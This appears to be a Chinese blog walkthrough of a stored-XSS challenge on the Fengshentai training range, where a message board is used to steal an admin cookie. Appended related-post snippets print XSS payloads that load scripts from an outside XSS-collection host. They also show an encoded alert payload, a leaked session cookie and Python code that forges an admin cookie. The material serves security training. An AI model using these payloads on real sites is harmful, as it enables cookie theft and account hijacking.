封神台靶场-第四章

最新推荐文章于 2022-10-19 00:11:10 发布
原创 最新推荐文章于 2022-10-19 00:11:10 发布 · 1.5k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试平台

第四章:为了更多的权限!

Tips:
1、存储型Xss
2、flag在cookie里,格式为zkz{…},xss bot 每10秒访问一次页面
3、自建Xss平台源码:http://www.zkaq.org/?t/99.html

  1. 登陆后根据提示要进行存储型xss注入。
    这里我们可以借助一个xss平台xss平台没有的可以在这里注册

  2. 创建项目
    在这里插入图片描述
    2.选择模块我这里选择自己想要的模块

在这里插入图片描述
3.复制如下代码到可能存在注入的地方

在这里插入图片描述
4.随便填入留言板提交

在这里插入图片描述
5.回到xss平台发现收到xss注入反馈
在这里插入图片描述
flag如下:
在这里插入图片描述

靶场日记-存储xss漏洞利用
Fengsheng96的博客
09-08 448
靶场环境 解题思路 通过阅读题目,已经了解到靶场留言板存在存储XSS漏洞,flagcookie存储XSS(Stored XSS) 又称为持久跨站点脚本,它一般发生在XSS攻击向量(一般指XSS攻击代码)存储在网站数据库,当一个面被用户打开的时候执行。每当用户打开浏览器,脚本执行。持久的XSS相比非持久性XSS攻击危害性更大, 因为每当用户打开面,查看内容时脚本将自动执行。所以我们只要通过一些在线的XSS平台获取管理员cookie,flag就在管理员cookie就解决了。 登陆一个在线x
文件解析漏洞——封神台漏洞靶场
m0_51442886的博客
06-09 1264
本文章禁止转发,如有雷同,后果自负
封神台——Cookie伪造目标权限(存储XSS
Zichel77的博客
07-04 1167
点击传送门看到的是一个留言板 我们首先要判断是否存在XSS 于是输入一串JS代码 看是否会弹出一个内容为'zkaq'的弹窗 出现了,说明存在XSS漏洞 关于XSS漏洞的科普如下 跨站脚本攻击是指恶意攻击者往Web插入恶意Script代码,当用户浏览该之时,嵌入其中Web面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输
封神台-第四章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马 实战演练】
08-04 2756
题目: Tips: 1、通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情 尤通过XSS终于得到了管理员Cookie,在修改了cookie后尤直接绕过了登录密码,看到了后台功能! 接下来要做的,就是找一个上传点,上传自己的shell了! ...
ctf实战 封神台靶场 第四关通关记录
weixin_30437847的博客
05-28 1316
发现留言板功能,顺手试下反射xss代码,结果成功的弹窗了 网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。 我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个 然后你可以看到一叠代码,这个就是两个模块中的XSS Payload。把生成的存储xss链接放入留言板提交成功后到xss平台等查...
封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
m0_65712192的博客
10-19 2269
封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
mbp 封神台靶场 四 (笔记)
qq_43558415的博客
02-09 708
打开链接,发现是个留言板,尝试xss注入,看看是否可行。 弹出1提示并发现字段变灰,说明注入成功,登录xss平台创建项目。 将此代码段植入刚才的区域中<script src=http://xsspt.com/2gVqle></script>然后查看项目内容发现flag 总结:本关主要是通过xss注入拿到管理员cookie的,见框就插是xss注入的常用手段,它主要通过用户输入...
封神台靶场-第二章
Mr_helloword的博客
07-12 3268
第二章:遇到阻难!绕过WAF过滤 1.查找有无sql注入点利用and 1=1发现做了过滤 使用order by 查字段数发现order by 没有被过滤,最后当字段为10时显示正常字段为10 2.因为网做了waf过略防护,这我们考虑用cookie注入,可以进行绕过: 这我们使用一个小工具进行注入(火狐插件) 这款工具可以自定义请求头响应头(Request header,Reponse header) 打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空
封神台靶场-第五章
Mr_helloword的博客
07-11 2020
第五章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储将上面的cookie值进行修改: 根据提示信息这
封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2511
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤正在追女神小芳,在得知小芳开了一家公司后,尤通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
登录别人的账户(仅在封神台靶场.mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
封神台-掌控者新靶场 - Kali系列4题
热门推荐
weixin_43821278的博客
03-11 1万+
靶场 - Kali系列【4题】 Kali渗透 - Sqlmap实操靶场
封神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1748
1
封神台-第四章 为了更多的权限!留言板
ploto_cs的博客
09-27 1316
封神台-第四章 为了更多的权限!留言板 1.进入留言的面,测试弹窗 根据提示为存储XSS 测试语句为 可以看到成功弹窗 2.搭建xss平台 随意注册一个账户 https://xsspt.com/index.php?do=login 配置前两个必须选 复制语句: </textarea>'"><script src=https://xsspt.com/ZIVFnr?1601173210></script> 3.测试新语句 4.xss平台看截取
封神台存储Xss靶场
qq_40941912的博客
10-05 721
作业 存储Xss靶场 (Rank: 10靶场上面是个finecms,然后在网上搜索了一下它所存在的漏洞,发现在404界面会将地址栏的get传参输入到日志面,存储到数据库,将参数值替换成我们构造好的payload,当管理员产看日志的时候会触发payload,存在一个存储xss 于是找到传参点: 在xss平台建立一个项目,得到构造好的payload: 当作m的参数传进去: 拿到cookie: 成功拿到flag{zKaQ-01sdfDCo0} 提交flag,成功
封神台sql注入的靶场,为了小芳,开冲
Wubuqing的博客
10-27 313
先判断是否存在注入 1=1 返回正常 1=2 返回错误 所以存在SQL注入 使用order by 查询该数据表的字段数量 Order by 2 返回正常 order by 3返回错误 所以字段数量是2 判断回显的位置 Union select 1,22回显 然后查询数据库名 union select 1,database() 得到数据库名为 maoshe 查询路径 union select 1,@@datadir 还有查询数据库版本 Union select 1,version() 然后查询表名
封神台DOM XSS靶场
qq_40941912的博客
10-05 1108
作业 DOM XSS靶场 (Rank: 10) 在面上可填写的地方都输入 Native编码: \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0032\u0033\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e 插入到url中,发现弹窗了: 此处的payload被当作代码执行了 把xss平台
封神台靶场跑不了爆破,临时解决办法(亲测有效)
hackzkaq的博客
04-19 3574
最近很多15期的同学都在反馈,靶场跑不了爆破 本人也实测靶场的防护是短时间内ban掉访问频率过快的ip 同样在实战用也会遇到这样的问题,我们不能改变环境的情况下,我们就去适应环境 那么绕过防护的方法目前能实现的就只有两个 1、降低访问频率 2、每次访问使用不同的ip 这两种方法我都帮同学们去实践了,你们按照我测出来的方法直接用就好 第一种,降低访问频率 这种方法目前只在靶场有效,实战中需要根据目标站点的具体防护进行测试 在burp跑爆破的时候,我们需要设置线程数 靶场我在经历过无数次被ban以后,测试出
封神台靶场writeup
weixin_44155363的博客
06-06 7939
封神台靶场 https://hack.zkaq.cn/battle 还是很有意思的一个靶场 查看源码,找到了字典文件; 用域名爆破工具,放入字典后爆破;答案为:http://8adc3387c2ed6cce.lab.aqlab.cn:81 aqlab.cn 一级域名 lab为二级域名 kali01就是三级域名; https://site.ip138.com/ 这个网站能通过同ip网站能直接查处结果; shop.aqlab.cn:8001 nmap完全扫描可发现,快速扫描无法发现; n
封神台靶场第三关
最新发布
03-26
### 封神台靶场第三关解决方案 封神台靶场是一个专门为新手设计的学习平台,其中包含了大量常见的 Web 安全漏洞[^3]。对于第三关的挑战,通常涉及 Cookie 的篡改以及权限提升的技术。 #### 背景分析 在这一关中,目标通常是通过修改浏览器中的 Cookie 来获取管理员权限并访问受保护的内容。Cookie 是一种客户端存储机制,在许多情况下用于保存用户的会话状态或身份验证信息。攻击者可以通过伪造这些数据来模拟合法用户的身份[^2]。 #### 技术实现方法 以下是解决此问题的具体技术手段: 1. **识别关键字段** 首先观察登录后的请求头部分,找到名为 `ADMINSESSIONIDCSTRCSDQ` 的 Cookie 值。这是一个典的会话 ID 字符串,可能用来区分不同用户的角色和权限。 2. **替换现有值** 使用开发者工具(如 Chrome DevTools),转到“Application”标签下的 Storage -> Cookies 中定位站点对应的记录项。将原有的随机字符串更改为已知有效的管理级令牌: ```plaintext LBMLMBCCNPFINOANFGLPCFBC ``` 3. **重新加载面** 修改完成后刷新当前网即可触发新的认证流程。如果一切正常,则应该能够跳转至后台管理系统界面。 4. **后续操作** 成功突破后可以进一步探索系统内部结构,了解潜在的安全隐患所在之处。不过需要注意的是,在真实环境中未经授权擅自尝试此类行为属于违法行为,请仅限于授权范围内的练习环境内实践上述技巧[^1]。 ```python import requests from http.cookiejar import MozillaCookieJar # 设置自定义 cookies cookies = {'ADMINSESSIONIDCSTRCSDQ': 'LBMLMBCCNPFINOANFGLPCFBC'} response = requests.get('http://example.com/admin', cookies=cookies) print(response.text) ``` 以上代码片段展示了如何利用 Python 请求库发送带有特定 cookies 参数的 HTTP GET 请求,从而模仿具有特殊权限的访客身份访问受限资源。 #### 总结 通过对 Cookie 数据的手动编辑实现了越权访问的功能演示。这一步骤揭示了不当处理用户输入可能导致严重的安全隐患——即使是在看似无害的小项目也需格外小心对待安全性议题。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值